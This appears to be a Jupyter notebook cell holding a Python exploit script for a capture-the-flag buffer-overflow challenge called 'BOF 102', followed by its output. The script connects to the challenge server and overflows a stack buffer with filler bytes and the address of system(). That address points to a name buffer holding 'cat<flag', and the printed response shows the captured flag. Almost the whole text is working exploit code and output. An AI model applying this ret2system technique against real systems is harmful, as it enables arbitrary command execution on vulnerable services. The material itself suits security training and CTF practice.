In [24]:
import socket
from Crypto.Util.number import long_to_bytes

class ServerConnection:
    def __init__(self):
        self.HOST = "bof102.sstf.site"
        self.PORT = 1337
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.connect((self.HOST, self.PORT))

    def send(self, desired_command, payload):
        prompt = self.socket.recv(1024)
        assert prompt.decode() == "Welcome to BOF 102!\n", prompt

        prompt = self.socket.recv(1024)
        assert prompt.decode() == "What's your name?\nName > ", prompt
        name = desired_command.encode() + b'\n'
        self.socket.sendall(name)

        prompt = self.socket.recv(1024)
        prompt = self.socket.recv(1024)
        assert prompt.decode() == 'Do you wanna build a snowman?\n > ', prompt
        self.socket.sendall(payload + b'\n')

        # Receive the response
        responses = []
        responses.append(self.socket.recv(1024))
        responses.append(self.socket.recv(1024))
        responses.append(self.socket.recv(1024))
        return responses

    def close(self):
        self.socket.close()
        
desired_command = 'cat<flag'
offset = 16

filler = b'_'
for address_of_system in [0x08048430]:
    for address_of_name in [0x804a06c]:
        for bits in [32]:
            for delta_offset in range(4, 8, 4):
                for order in ('little',):
                    connection = ServerConnection()

                    payload = filler * (offset + delta_offset)
                    payload += address_of_system.to_bytes(bits//8, order)
                    payload += address_of_name.to_bytes(bits//8, order)
                    payload += address_of_name.to_bytes(bits//8, order)
                    payload += address_of_name.to_bytes(bits//8, order)

                    # print(payload)
                    # Now you can send this payload as input to the program
                    response = connection.send(desired_command, payload)
                    print(f'address_of_system:{address_of_system}, address_of_name:{address_of_name}, bits:{bits}, delta_offset:{delta_offset}, order:({order})')
                    print(f'"{response}"')
                    # print()
                    connection.close()

address_of_system:134513712, address_of_name:134520940, bits:32, delta_offset:4, order:(little)
"[b'!!!____________________0\x84\x04\x08l\xa0\x04\x08l\xa0\x04\x08l\xa0\x04\x08!!!\n', b'Good.\nSCTF{574ck_iS_g00d_bu7_d4n9erOu5}\n', b'']"
